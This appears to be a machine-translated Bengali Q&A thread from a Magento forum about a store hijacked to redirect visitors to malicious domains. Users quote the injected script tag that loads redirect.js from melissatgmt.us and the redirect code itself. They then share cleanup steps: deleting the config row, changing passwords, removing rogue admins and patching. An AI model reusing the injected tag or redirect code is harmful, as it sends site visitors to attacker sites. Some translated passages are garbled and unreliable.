ওয়েবসাইট অন্য url এ পুনঃনির্দেশ শুরু করে

9

Maybe it's infected by some virus.

আমার ওয়েবসাইট এই সংক্রামিত ইউআরএলে পুনঃনির্দেশ শুরু করে।

http://mon.setsu.xyz
এবং কিছু সময় https://tiphainemollard.us/index/?1371499155545
সংক্রামিত লিঙ্ক

আমি সমাধান করতে কি করেছি।

  1. মন্তব্য করা হয়েছে। Htaccess ফাইল (কিছুই ঘটেনি)
  2. মন্তব্য করা হয়েছে ফোল্ডার অন্তর্ভুক্ত (কিছুই ঘটবে না)
  3. স্ক্যান করা সম্পূর্ণ সার্ভার (কোনও কিছুই ভাইরাস ম্যালওয়্যার পাওয়া যায়নি)
  4. আবহাওয়াটির পিএইচপি বা যে কোনও জেএস করছে তা নিশ্চিত করার জন্য ডাটাবেস থেকে সিএসএস, মিডিয়া এবং জেএসের পথ পরিবর্তন করা হয়েছে (কিছুই ঘটেনি)
  5. select * from core_config_data where path like '%secure%';সমস্ত লিঙ্ক ঠিক আছে আপডেট

আমি গুগল করেছিলাম এবং এতে অনেক নিবন্ধ লেখা হয়েছিল তবে তারা পরামর্শ দেয় এটি ব্রাউজারের সমস্যা বা আমার সিস্টেম সংক্রামিত। আমি নিজের ফোনে বা আমার ব্যক্তিগত ল্যাপটপে সাইটটি খুললেও এ সম্পর্কিত একটি নিবন্ধ , সমস্যাগুলি একই।

আপডেট 2

আমি প্রভাবিত ডাটাবেজে সারিটি পেয়েছি। (যেমনটি বলছেন বরিস কে।)

ইন core_config_data টেবিল design/head/includes মান একটি আছে

<script src="<a href="https://melissatgmt.us/redirect_base/redirect.js">https://melissatgmt.us/redirect_base/redirect.js</a>" id="1371499155545"></script>

যা পৃষ্ঠা লোডের শীর্ষ বিভাগে সন্নিবেশ করা হবে।

আপনি উপরের ইউআরএলটি পরিদর্শন করলে আপনি পুনর্নির্দেশের একটি স্ক্রিপ্ট পাবেন যা এটি 

   var redirChrome;
var isToChrome = document.currentScript.getAttribute('data-type');

if((isToChrome == 1 && navigator.userAgent.indexOf("Chrome") != -1) || !isToChrome){

 var idToRedirect = document.currentScript.getAttribute('id'); 

window.location.replace('https://tiphainemollard.us/index/?'+idToRedirect);
}

একবার আমি সেই স্ক্রিপ্টটি সরিয়ে দিলে ক্লায়েন্ট ওয়েবসাইট দুপুর থেকে কাজ করছে। But the main problem is how that script inserted into the database.

একটি প্যাচও পুরানো তাই আমি সেই প্যাচটিও আপডেট করেছি।

আপডেট 3 সাইটটি আবার সংক্রামিত হয়েছে। এটি অ্যাডমিন বিভাগে theোকানো স্ক্রিপ্ট ( প্রশাসক-> কনফিগারেশন-> সাধারণ-> ডিজাইন-> এইচটিএমএল হেড-> বিবিধ স্ক্রিপ্ট ) অ্যাডমিন

এবং ডাটাবেস কলামে তথ্যশালা

আমি এখন কি করব জানি না। আমি প্রতিটি পাসওয়ার্ড পরিবর্তন করার সাথে সাথে সমস্ত পুরানো ব্যবহারকারী মুছে ফেলা হয়েছে।

আপডেট 3

এখনও অবধি ত্রুটিটি আসেনি তাই এর অর্থ হল উপরোক্ত পদক্ষেপগুলি অনুসরণ করে আমরা এই সমস্যাটি কাটিয়ে উঠতে পারি।

আপডেট :: 4 সর্বদা প্যাচগুলি ইনস্টল করুন কারণ প্রকল্পগুলিতে এই ধরণের সমস্যাগুলির জন্য স্টোরকে কম প্রবণ করতে সহায়তা করে এবং প্যাচগুলিও গুরুত্বপূর্ণ। কেউ তাদের ওয়েবসাইটে সমস্যাগুলি পরীক্ষা করতে https://magescan.com/ ব্যবহার করতে পারেন ।

magento-1  url  redirect 
inrsaurabh
সূত্র
আপনার সিস্টেমে প্রভাবিত হতে পারে দয়া করে এটি পরীক্ষা করে দেখুন। আপনার ব্রাউজারটি পরীক্ষা করুন।
রমা চন্দ্রন এম
@ রমাচন্দ্রন যখন আমি এই ইউআরএলটি গুগল করি তখন প্রায় প্রত্যেকেরই পরামর্শ যে এটি ব্রাউজার ইস্যু। আমি আমার ফোনেও একই সমস্যাটি প্রকাশ করেছি।
ইনসৌরভ
দয়া করে আপনার ওয়েবসাইট url সরবরাহ করুন
রামা চন্দ্রন এম
1
আমি মোছা <স্ক্রিপ্ট src = "<একটি href =" melissatgmt.us/redirect_base/redirect.js">https://... > "ID =" 1371499155545 "> </ স্ক্রিপ্ট> ডিজাইন / মাথা থেকে / অন্তর্ভুক্ত করা হয়েছে। এটি এখনও কাজ করে না। এবং আমি আমার ওয়েবসাইটটি দেখার পরে, সেই জাভাস্ক্রিপ্ট কোডটি আবার প্রদর্শিত হচ্ছে। আপনার কি কিছু চিন্তা আছে? ওয়েবসাইটের ঠিকানা hdvideodepot.com
মার্ক
1
আপনি দয়া করে ম্যাজেন্টো সংস্করণ ট্যাগ যুক্ত করতে পারেন?
এসভি

উত্তর:

6

আমি ইনজেকশনের কোড পাওয়া core_config_dataটেবিল অধীনে design/head/includes। এটি সরানো হয়েছে এবং এখন সাইটটি স্বাভাবিক অবস্থায় ফিরে এসেছে।

আপডেট: অন্য প্রত্যেকে যেমন উল্লেখ করেছে, আজ সকালে আবার এটি ঘটেছিল। এবার আমি এডমিন প্যানেল এর অধীনে আরও সহজেই এ থেকে মুক্তি পেয়েছি System > Configuration > General > Design > HTML Head > Miscellaneous Scripts। এটি একটি বিশাল দুর্বলতা, আমি আশা করি ম্যাজেন্টো একটি প্যাচটিতে কাজ করছে।

আপডেট 2: স্ক্রিপ্ট আবার ফিরে আসল, তাই আমি ডিবি পাসওয়ার্ড পরিবর্তন করেছি, ক্যাশে সাফ করেছি। প্রায় এক ঘন্টা পরে, স্ক্রিপ্টটি আবার ফিরে আসে। সুতরাং আমি মনে করি না এটি ডিবি মাধ্যমে যুক্ত করা হচ্ছে। আমি স্রেফ আমার প্রশাসনের পাসওয়ার্ড পরিবর্তন করেছি, আসুন দেখি এটি আবার ফিরে আসে কিনা।

আপডেট 3: যেহেতু আমি গতকাল আমার দু'টি প্রভাবিত সাইটেই প্রশাসকের পাসওয়ার্ড পরিবর্তন করেছি, প্রায় 24 ঘন্টা পরে উভয় এখনও পরিষ্কার still

বরিস কে।
সূত্র
2
বাহ, এটি একটি বিশাল সুরক্ষা লঙ্ঘন, কোন ধরণের দুর্বলতার কারণে এটি কোনও ধারণা?
ইয়েয়া এ .সালাম
3
ম্যাজেন্টোর পুরানো সংস্করণগুলির একটি গর্ত হতে হবে। আমার কাছে ম্যাজেন্টো ২.১ এ নির্মিত একটি সাইট রয়েছে যা প্রভাবিত হয় নি, তবে সংস্করণ 2 এর নীচে প্রতিটি সাইট পুনঃনির্দেশিত হচ্ছে।
বোরিস কে।
এটি একটি বিশাল সুরক্ষা ইস্যু। টেবিলে কোডটি কীভাবে ইনজেক্ট করা হয়েছিল তা কি কেউ জানেন? সেই টেবিলটি যেখানে অ্যাডমিন অঞ্চল থেকে, আমরা ওয়েবসাইটের পাদলেখ / শিরোলেখগুলিতে শৈলী এবং জাভাস্ক্রিপ্ট যুক্ত করতে পারি। হ্যাকার কীভাবে আপোষ করতে পারে? এর অর্থ কি প্রশাসকের কাছে তাদের অ্যাক্সেস ছিল?
চিনাবাদাম
এটি মুছে ফেলার পরে ফিরে পেতে থাকে, কী করবেন তা নিশ্চিত হন না
ইয়েহিয়া এ.সালাম
আমি সিস্টেম> অনুমতি> ব্যবহারকারীদের দূষিত ব্যবহারকারীদের সনাক্ত করেছি। এগুলি অপসারণ করার পরে (এবং পূর্বে টেবিলটি কোর_কনফিগ_ডেটা ঠিক করার পরে এবং প্রশাসকের পাসওয়ার্ড পরিবর্তন করার পরে) এটি স্থিতিশীল মনে হয় তবে আমি কীভাবে এটি প্রথম স্থানে হয়েছিল তা জানতে চাই। গর্ত / পিছনের অংশটি এখনও সেখানে থাকতে পারে এবং এটি একটি রহস্য।
চিনাবাদাম
3

অন্য ম্যাজেন্টো সাইটে একই সমস্যা। আমি আবিষ্কার করেছি যে কোনও স্ক্রিপ্ট পৃষ্ঠার হেড বিভাগে ইনজেকশনের মাধ্যমে মেলিসাট্যাগমিট.উস থেকে redirect_base / redirect.js (পরে অন্য ডোমেনে পরিবর্তিত) অনুরোধ করেছে তবে কীভাবে এই ছিটেটি ইনজেকশন দেওয়া হয়েছে তা অনুমান করতে পারছি না।

আপডেট : অন্যদের দ্বারা উল্লিখিত হিসাবে, কোর_কনফিগ_ডেটা সারণিতে প্রবেশের সন্ধান পেয়েছে এবং এটি সরিয়ে ফেলেছে তবে পরের পৃষ্ঠার পুনরায় লোডে রেকর্ডটি ফিরে এসেছিল। আমি ডিবি পাসওয়ার্ড পরিবর্তন করেছি এবং এখন এটি পরাজিত বলে মনে হচ্ছে। আমি নিশ্চিত নই যে পাসওয়ার্ড পরিবর্তন চূড়ান্ত সমাধান তবে যাইহোক সুরক্ষার উন্নতি।

আপডেট 2 : জিক্স সাসের বক্তব্য অনুসারে, ম্যাজেন্টো প্রশাসনের কনফিগারেশন থেকে অ্যাক্সেস করা সরাসরি ডাটাবেস সারণিতে অ্যাক্সেস করার চেয়ে সহজ সমাধান। তবে বিষ্ঠা প্রতি 10/15 মিনিটে ফিরে আসতে থাকে।

আপডেট 3 : অ্যাডমিনের পাসওয়ার্ড পরিবর্তিত হয়েছে, কিছু সেমি পৃষ্ঠাগুলি (গ্রাহক-পরিষেবা এবং আমাদের সম্পর্কে) যাচাই করে দেখা গেছে যা কোনওরকমভাবে সংক্রামিত, অক্ষম ক্যাশে, পরিষ্কার ক্যাশে কয়েকবার ('সংক্রামিত' সেন্টিমিটার পৃষ্ঠার প্রতিটি পরীক্ষার পরে সংরক্ষণ করুন) নং গত ৮ ঘন্টার মধ্যে আরও স্ক্রিপ্ট ইনজেকশন করা হয়েছে।

কনজিউল্যাঞ্জা ইনফরম্যাটিকা
সূত্র
হ্যাঁ, ঠিক আছে, আমি সারিটি পেয়েছি যা ক্ষতিগ্রস্থ হয়েছে।
ইনসৌরভ
নোট করুন যে ম্যাজেন্টো অ্যাডমিন সমস্যা ছাড়াই অ্যাক্সেসযোগ্য এবং ওয়েব লগে আমি দেখতে পারি যে বট অ্যাক্সেসগুলি প্রভাবিত হয় না। আমি মনে করি ম্যালওয়্যারটি সীমারেখার মধ্যে সীমাবদ্ধ এবং ব্রাউজারের ব্যবহারকারী এজেন্টটি পরীক্ষা করে।
কনজিউল্যাঞ্জা ইনফরম্যাটিকা
সুতরাং আপনি কি জানেন যে এটি কোথা থেকে ইনজেকশন করা হয়েছিল?
ইয়েয়া এ .সালাম
হ্যাঁ আমি নিশ্চিত করতে পারি যে এটি ডাটাবেস থেকে এন্ট্রি মোছার পরেও প্রতি 10/15 মিনিটে ফিরে আসতে থাকে
ইয়েহিয়া এ। সালাম
2

আমি অ্যাডমিন প্যানেলে প্রবেশের পথটি পরিবর্তন করেছি app/etc/local.xmlএবং এটি সহায়তা করে। স্ক্রিপ্টটি আর যুক্ত হয় না design/head/includes

ব্যাখ্যা:

ইন app/etc/local.xmlআমি পরিবর্তন <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>পূর্বে এটি ছিল sitedomain.com/admin, এবং এখন অ্যাডমিন প্যানেলে পথ হতে হবে sitedomain.com/new_admin_path

Eugenia
সূত্র
দুঃখিত আপনি যা করেছেন তা আমি আপনাকে পাই নি, দয়া করে ব্যাখ্যা করুনwhich path u chagned
ইনসারৌরভ
অ্যাপ্লিকেশন / ইত্যাদি / লোকাল.এক্সএমএল আমি পরিবর্তিত <admin> <routers> <adminhtml> <args> <frontName><![CDATA[new_admin_path]]></frontName> </args> </adminhtml> </routers> </admin>হয়েছিল আগে এটি sitedomain.com/admin ছিল, এবং এখন অ্যাডমিন প্যানেলের পথ হবে sitedomain.com/new_admin_path
ইউজেনিয়া
ঠিক আছে আপনি যা পরামর্শ দিচ্ছেন তা আমি পেয়েছি
ইনসারৌরভ
1

এটি এত বড় ত্রাণ, আমি আমার সাইটটি সকাল থেকে 10 বার পুনঃস্থাপন করেছি।

বাগ বার বার আসতে থাকে।

চূড়ান্ত সমাধান কি?

ডিবি পাসওয়ার্ড বদলাবেন? রুট পাসওয়ার্ড পরিবর্তন করবেন? কোন প্যাচ মুক্তি পেয়েছে?

আমি নিশ্চিত না যে এটি সম্পর্কিত কিনা আমি সুরক্ষা পরামর্শদাতার ইমেল নীচে পেয়েছি

প্রিয় স্যার বা ম্যাডাম,

আমরা হাতিমেরিয়া, সুইজারল্যান্ড, পোল্যান্ড এবং নেদারল্যান্ডসে অবস্থিত একটি ম্যাজেন্টো উন্নয়ন সংস্থা।

সম্প্রতি, আমরা একটি নতুন ক্লায়েন্টের সাথে কাজ শুরু করেছি এবং তার পুরানো সার্ভারটি হাতে নিয়েছি। এই মুহুর্তে আমরা সার্ভারটি অ্যাক্সেস করেছি, আমরা কিছু ম্যালওয়্যারকে হোঁচট খেয়েছি, যার সাহায্যে হ্যাকাররা ক্লায়েন্টটির সার্ভারটি নিতে পেরেছিল এবং অন্যান্য ওয়েবসাইট হ্যাক করতে একটি "হ্যাকার মেশিন" হিসাবে ব্যবহার করে। অবশ্যই ক্লায়েন্ট জানতেন না যে এটি তার সার্ভারে ঘটছে।

আমরা আপনার ওয়েবসাইটটির ডাটাবেস শংসাপত্রগুলি পেয়েছি যা সেই সার্ভারের মাধ্যমে হ্যাক হয়েছিল। অবশ্যই আমরা এটি দিয়ে কিছুই করব না, তবে আমি আপনার সাথে যোগাযোগ করতে বাধ্য এবং বোধ করি যা চলছে তা আপনাকে জানাতে বাধ্য feel হ্যাকটি ম্যাজেন্টো ক্যাশেলেক দুর্বলতার মধ্য দিয়ে করা হয়েছিল, এটি এখনও আপনার দোকানে উপস্থিত থাকতে পারে।

আমি আপনাকে অবিলম্বে সেই দুর্বলতার যত্ন নিতে এবং আপনার ডাটাবেসের পাসওয়ার্ড পরিবর্তন করতে পরামর্শ দিচ্ছি। আমাদের প্রযুক্তিবিদরা বলছেন এটি প্রায় 30 মিনিট সময় নেয়।

ওয়েবসাইট ম্যাগেরপোর্টে আপনি দেখতে পাচ্ছেন যে আপনার ওয়েবসাইটটি আর কী কীর জন্য ঝুঁকিপূর্ণ হতে পারে: https://www.magereport.com/scan/?s=

এই ইমেলটির আমার প্রাথমিক উদ্দেশ্যটি গ্রাহক অধিগ্রহণ করা নয়, তবে আপনার যদি আপনার স্টোরটি সুরক্ষিত করতে সহায়তা প্রয়োজন হয় বা অন্য কোনও প্রশ্ন থাকে তবে আমরা সাহায্য করে খুশি।

বিনীত সাথে, টমাস ট্যানার

সুতরাং আমি অনুমান করি সমাধানটি ডিবি পাসওয়ার্ড পরিবর্তন করুন

মোহিত খাত্রী
সূত্র
1

এ জাতীয় স্প্যাম ইনজেকশনের মূল কারণ কী তা আমাদের বুঝতে হবে

যদি আপনার সাইটটি ইনজেকশন দেওয়া হয়, তবে দয়া করে সমস্ত তিনটি ম্যালওয়্যার স্ক্যানে আপনার সাইটটি দেখুন

https://magescan.com

https://www.magereport.com

https://sitecheck.sucuri.net/

সুরক্ষা প্যাচ হারিয়ে যাওয়ার কারণে আমার এই বোধ হয়! যদি আপনি কোনও প্যাচ অনুপস্থিত দেখতে পান তবে এই বিষয়টির নীচে প্রতিবেদন করুন

  1. হোস্টিং অ্যাক্সেস পাসওয়ার্ড পরিবর্তন করুন ডাটাবেসের পাসওয়ার্ড পরিবর্তন করুন প্রশাসক লগইন পাসওয়ার্ড পরিবর্তন করুন প্রশাসকগণ এবং ইউআরএলগুলি ডাউনলোড করুন এবং লুকান / আরএসএস / সর্বজনীন দৃষ্টিভঙ্গি থেকে।

  2. পূর্ণ সাইট ভাইরাস স্ক্যান করুন, আপনার হোস্টিং সরবরাহকারী যদি আপনি নিজে এটি না করতে পারেন তবে সাইটটি স্ক্যান করতে সক্ষম।

  3. সিসটেম -> ব্যবহারকারীদের কাছে যান এবং দেখুন অ্যাকাউন্টে কোনও অচ্ছুক নিবন্ধিত ব্যবহারকারী আছে কিনা।

আইকন
সূত্র
0

আমি বিষয়টি ঠিক করেছি। এমনকি আমি মূল্য টেবিলে <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script>থেকে এই ফাইলটি মুছলাম । এটি সমস্যার সমাধান করেনি। স্ক্রিপ্ট কোডটি বারবার sertedোকানো হয়েছিল। সমস্যা সমাধানের জন্য, এই তিনটি ধাপটি অনুসরণ করুন।core_config_datadesign/head/includes

  1. core_config_dataটেবিল থেকে স্ক্রিপ্ট কোডটি মুছুন design/head/includes
  2. app/etc/local.xmlশংসাপত্র সহ ডাটাবেস পাসওয়ার্ড পরিবর্তন করুন ।
  3. এই কমান্ডটি ব্যবহার করে রুট ম্যাজেন্টো ফোল্ডারে ক্যাশে সাফ করুন rm -rf var/cache/*

পিএস আমি সারা দিন কাটিয়েছি। আশা করি, এটি আপনার পক্ষে কাজ করবে। এবং নিশ্চিত রাখুন যে ফাইলটি সর্বদা ব্যাকআপ করুন।

ছাপ
সূত্র
0

এই ঠিক একই জিনিস আমার আজ ঘটেছে! একই ওয়েবসাইটে পুনর্নির্দেশ করা হচ্ছে। তবে, আমি কনফিগারেশন> ডিজাইন> এইচটিএমএল হেড> মিসক স্ক্রিপ্টগুলির অধীনে ম্যাজেন্টো অ্যাডমিন প্যানেলে স্ক্রিপ্টটি পেয়েছি। এই স্ক্রিপ্টটি ছিল: <script src="https://melissatgmt.us/redirect_base/redirect.js" id="1371499155545"></script> আমি সেখান থেকে এটি সরিয়ে দিয়েছি এবং ওয়েবসাইটটি ঠিকঠাকভাবে কাজ করছে। আমার কাছে ফোল্ডারটি নেই যা আপনি বলেছিলেন যে আপনি স্ক্রিপ্টটি খুঁজে পেয়েছেন it কোন ধারণাটি এটি কোথায় হতে পারে? (যেমন আপনি এইচটিএমএল হেডের> মিস স্ক্রিপ্টগুলির পথ জানেন)

এছাড়াও, আপনি সম্প্রতি কি করলেন? সম্ভবত আমরা কারণ খুঁজে বের করতে পারি? আমার জন্য, আমি একটি ফ্রি নিউজলেটার পপআপ ইনস্টল করেছি যা এর কারণ হতে পারে। তোমার খবর কি?

আপডেট: ভাল এখন স্ক্রিপ্ট ফিরে। কেউ আমাকে বলুন আমি কীভাবে এই স্ক্রিপ্টটি ডাটাবেস থেকে এটি সরাতে অ্যাক্সেস করতে পারি?

আপডেট 2: মার্ক দ্বারা বর্ণিত হিসাবে, স্ক্রিপ্টটি সরিয়ে এবং ডাটাবেস পাসওয়ার্ড পরিবর্তন করা এই স্ক্রিপ্টটি ফিরে আসতে বাধা দিয়েছে। যদি কেউ এই দুর্বলতার নাম জানেন বা গ্রাহকদের অর্থ প্রদানের কোনও বিপদ রয়েছে, দয়া করে আমাদের জানান।

جيلبير
সূত্র
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.